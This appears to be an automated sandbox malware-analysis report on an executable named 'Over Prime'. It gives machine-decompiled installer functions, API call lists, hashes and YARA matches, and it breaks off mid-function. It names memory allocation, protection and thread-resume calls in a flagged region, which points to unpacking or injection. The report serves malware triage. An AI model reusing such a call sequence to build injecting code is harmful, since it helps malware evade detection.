SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
GetDlgItem.USER32(?,000003F8), ref: 0040575A

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

GetDlgItem.USER32(?,000003EC), ref: 0040589E
CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
CloseHandle.KERNELBASE(00000000), ref: 004058B3
ShowWindow.USER32(00000000), ref: 004058D7
ShowWindow.USER32(000B004E,00000008), ref: 004058DC
ShowWindow.USER32(00000008), ref: 00405926
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
CreatePopupMenu.USER32 ref: 0040596B
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
GetWindowRect.USER32(?,?), ref: 0040599F
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
OpenClipboard.USER32(00000000), ref: 00405A00
EmptyClipboard.USER32 ref: 00405A06
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
GlobalLock.KERNEL32(00000000), ref: 00405A1C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
GlobalUnlock.KERNEL32(00000000), ref: 00405A50
SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
CloseClipboard.USER32 ref: 00405A61

Strings

{, xrefs: 00405944

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 31d53ebfca1d6a6c60948640a960746d46598940cbf3ff3663529959692270eb
Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
Opcode Fuzzy Hash: 31d53ebfca1d6a6c60948640a960746d46598940cbf3ff3663529959692270eb
Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00405C49 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405F14(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x434f88 =  *0x434f88 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040653D(0x42f270, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E58(_t68);
					} else {
						lstrcatW(0x42f270, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x42f270,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040653D(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405C01(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E0040559F(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x434f88 =  *0x434f88 + 1;
										} else {
											E0040559F(0xfffffff1, _t68);
											E004062FD(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C49(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x42f270 - 0x5c;
					if( *0x42f270 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406873(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405E0C(_t68);
							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E0040559F(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E0040559F(0xfffffff1, _t68);
							return E004062FD(_t67, _t68, 0);
						}
						L30:
						 *0x434f88 =  *0x434f88 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405c53
0x00405c58
0x00405c61
0x00405c64
0x00405c6c
0x00405c6f
0x00405c72
0x00405c7a
0x00405c7c
0x00405c7d
0x00000000
0x00405c7d
0x00405c88
0x00405c8b
0x00405c8b
0x00405c8b
0x00405c8f
0x00405ca2
0x00405ca9
0x00405cae
0x00405cb2
0x00405cc2
0x00405cb4
0x00405cba
0x00405cba
0x00405cc7
0x00405ccb
0x00405cd7
0x00405cdd
0x00405ce2
0x00405ce8
0x00405cf3
0x00405cf9
0x00405cfb
0x00405cfe
0x00405da8
0x00405da8
0x00405dac
0x00405dae
0x00405dae
0x00405dae
0x00405dae
0x00000000
0x00000000
0x00000000
0x00000000
0x00405d04
0x00405d04
0x00405d04
0x00405d0c
0x00405d2c
0x00405d34
0x00405d39
0x00405d40
0x00405d5b
0x00405d60
0x00405d62
0x00405d86
0x00405d64
0x00405d64
0x00405d67
0x00405d7b
0x00405d69
0x00405d6c
0x00405d74
0x00405d74
0x00405d67
0x00405d42
0x00405d48
0x00405d4a
0x00405d50
0x00405d50
0x00405d4a
0x00000000
0x00405d40
0x00405d0e
0x00405d16
0x00000000
0x00000000
0x00405d18
0x00405d20
0x00000000
0x00000000
0x00405d22
0x00405d2a
0x00000000
0x00000000
0x00000000
0x00405d8b
0x00405d93
0x00405d99
0x00405d99
0x00405da2
0x00000000
0x00405da2
0x00405ccd
0x00405cd5
0x00000000
0x00000000
0x00000000
0x00405c91
0x00405c91
0x00405c93
0x00405db3
0x00405db5
0x00405db8
0x00405e09
0x00405e09
0x00405e09
0x00405dba
0x00405dbd
0x00405dc8
0x00405dcd
0x00405dcf
0x00000000
0x00000000
0x00405dd2
0x00405dde
0x00405de3
0x00405de5
0x00000000
0x00405e00
0x00405de7
0x00405dea
0x00000000
0x00000000
0x00405def
0x00000000
0x00405df6
0x00405dbf
0x00405dbf
0x00000000
0x00405dbf
0x00405c99
0x00405c9c
0x00000000
0x00000000
0x00000000
0x00405c9c

APIs

DeleteFileW.KERNELBASE(?,?,75B53420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75B53420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75B53420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
FindClose.KERNEL32(00000000), ref: 00405DA2

Strings

., xrefs: 00405D04
., xrefs: 00405D18
\*.*, xrefs: 00405CB4
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C56

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1953461807
Opcode ID: 2ea8aa6a8d4f7201961980de833ab884f2753d9f6dddac351d402a454eb76660
Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
Opcode Fuzzy Hash: 2ea8aa6a8d4f7201961980de833ab884f2753d9f6dddac351d402a454eb76660
Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE

Uniqueness

Uniqueness Score: -1.00%

Function 02C44228 Relevance: 3.3, APIs: 2, Instructions: 285memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02C43485: LoadLibraryA.KERNELBASE(?,00000000,?,02C4760D,?), ref: 02C435FB

NtAllocateVirtualMemory.NTDLL(-6C6B2C72), ref: 02C44503

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 65145b849ebce938a73475dcf74561134b81da502b561f43f697652d9d39d722
Instruction ID: d671bfbf967e718fe8404b1ec7ada105ec159d90eef1ce69e90ed212dafa6f7f
Opcode Fuzzy Hash: 65145b849ebce938a73475dcf74561134b81da502b561f43f697652d9d39d722
Instruction Fuzzy Hash: E9916E756443458FDB399D28CDA57EF3763AF863A0F54822DDC4E8B284DB318A45CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02C42AD7 Relevance: 3.2, APIs: 2, Instructions: 156filelibraryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,2798DC39,00216417), ref: 02C42C88
LoadLibraryA.KERNELBASE(?,00000000,?,02C4760D,?), ref: 02C435FB

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID: CreateFileLibraryLoad
String ID:
API String ID: 2049390123-0
Opcode ID: dfaae555cbe52bd59d907773066635be4c66d93abf56b30567137c5f46c74d4d
Instruction ID: 3e72cc537991a816622e243546ea41081c65a4d3aa7867ac0f31ffc597693f86
Opcode Fuzzy Hash: dfaae555cbe52bd59d907773066635be4c66d93abf56b30567137c5f46c74d4d
Instruction Fuzzy Hash: B0517BB55043458FCF355D2989A47EF7B63AFD5370FA1816EEC8A9B204DB344A42C602

Uniqueness

Uniqueness Score: -1.00%

Function 00406873 Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406873(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4302b8;
			}

0x0040687e
0x00406887
0x00000000
0x00406894
0x0040688a
0x00000000

APIs

FindFirstFileW.KERNELBASE(75B53420,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75B53420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75B53420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
FindClose.KERNEL32(00000000), ref: 0040688A

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD

Uniqueness

Uniqueness Score: -1.00%

Function 02C372EB Relevance: 1.7, APIs: 1, Instructions: 248libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000000,?,02C4760D,?), ref: 02C435FB

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1efd8f52e62016d15fedc77b2f245f53a78f84efa0e319bc902fa45b5e084d1e
Instruction ID: db6d17abe83fa1a2f26f9dc328d296f24abeb7366fb0c025a7414453a5dc11f4
Opcode Fuzzy Hash: 1efd8f52e62016d15fedc77b2f245f53a78f84efa0e319bc902fa45b5e084d1e
Instruction Fuzzy Hash: F4813975A043459FCF355E298D947EF7B63AFC6360F60812EDC8A9B204CB704A85CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02C4504C Relevance: 1.7, APIs: 1, Instructions: 212libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000000,?,02C4760D,?), ref: 02C435FB

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2d3e7db7bb17e1d699d78126b798c1be59aaea894100f98db89e68d466622635
Instruction ID: e4d34b34c0ff6bf59325e7db24f07028793b96c7fd63000befbd7e9cb6d2ea98
Opcode Fuzzy Hash: 2d3e7db7bb17e1d699d78126b798c1be59aaea894100f98db89e68d466622635
Instruction Fuzzy Hash: 90517D756003489FDF395E2589A53EF7773AFC1760FA0812EDC869B245DB710A8ACB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C46A48 Relevance: 1.6, APIs: 1, Instructions: 58nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(00000001,02C4716F), ref: 02C46CD3

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a279bec249379373561b24c3981ec3f96abf1c26a0a65be18cf015957a36b0a5
Instruction ID: 063f4796f65355a2b74b19d3112ca70358be0f8e23a5bfea7d8590ad1e660061
Opcode Fuzzy Hash: a279bec249379373561b24c3981ec3f96abf1c26a0a65be18cf015957a36b0a5
Instruction Fuzzy Hash: 5611C830B04B05CEDB259D778A983EB37AA9F9B344F798126CD438B20CDF309685CA11

Uniqueness

Uniqueness Score: -1.00%

Function 02C463FE Relevance: 1.5, APIs: 1, Instructions: 44nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(-15BC6E28,?,?,?,?,02C4545C), ref: 02C464C0

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 57d6a153e28e55f7020933cbf1e774a986049f13a81e890a24e058aa9cd054ae
Instruction ID: 81b51d109e26a166bd1d92fe5ed04fa6bb7fc0b4b4c5c2cfa65eb2d556a0739e
Opcode Fuzzy Hash: 57d6a153e28e55f7020933cbf1e774a986049f13a81e890a24e058aa9cd054ae
Instruction Fuzzy Hash: 3D015E70740388DFDF38CE68DCA8BEA37A6ABE9304F90412DDD4A9B349DB315A45C614

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E0040290B(short __ebx, short* __edi) {
				void* _t8;
				void* _t21;

				_t8 = FindFirstFileW(E00402DA6(2), _t21 - 0x2dc); // executed
				if(_t8 != 0xffffffff) {
					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040653D();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x0040291a
0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
Opcode Fuzzy Hash: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t146;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x42d250 = _t34;
					if(_t130 == 0x110) {
						 *0x434f08 = _t127;
						 *0x42d264 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x42b230 = _t91;
						E00404499(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
						 *0x433ecc = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x42d250 = 1;
					}
					_t124 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x434f20;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044E5(0x40b);
						while(1) {
							_t36 =  *0x42d250;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x0
							__eflags = _t38 -  *0x434f24;
							if(_t38 ==  *0x434f24) {
								E0040140B(1);
							}
							__eflags =  *0x433ecc - _t136; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a368 -  *0x434f24; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404499(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x434f8c - _t136;
							_v28 = _t48;
							if( *0x434f8c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004044BB(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x42b230, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x434f8c - _t136;
							if( *0x434f8c == _t136) {
								_push( *0x42d264);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x42b230);
							}
							E004044CE();
							E0040653D(0x42d268, E00403F7B());
							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x42d268); // executed
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x433ed8); // executed
									 *0x42c240 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x433ed8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404499(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x433ecc - _t136; // 0x0
									if(__eflags != 0) {
										goto L63;
									}
									ShowWindow( *0x433ed8, 8); // executed
									E004044E5(0x405);
									goto L60;
								}
								__eflags =  *0x434f8c - _t136;
								if( *0x434f8c != _t136) {
									goto L63;
								}
								__eflags =  *0x434f80 - _t136;
								if( *0x434f80 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x433ed8);
						 *0x434f08 = _t136;
						EndDialog(_t127,  *0x42ba38);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x433ed8, 0x40f, 0, 1);
						__eflags =  *0x433ecc - _t136; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									L28:
									return E00404500(_a8, _t122, _a16);
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x434f8c - _t136;
											if( *0x434f8c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
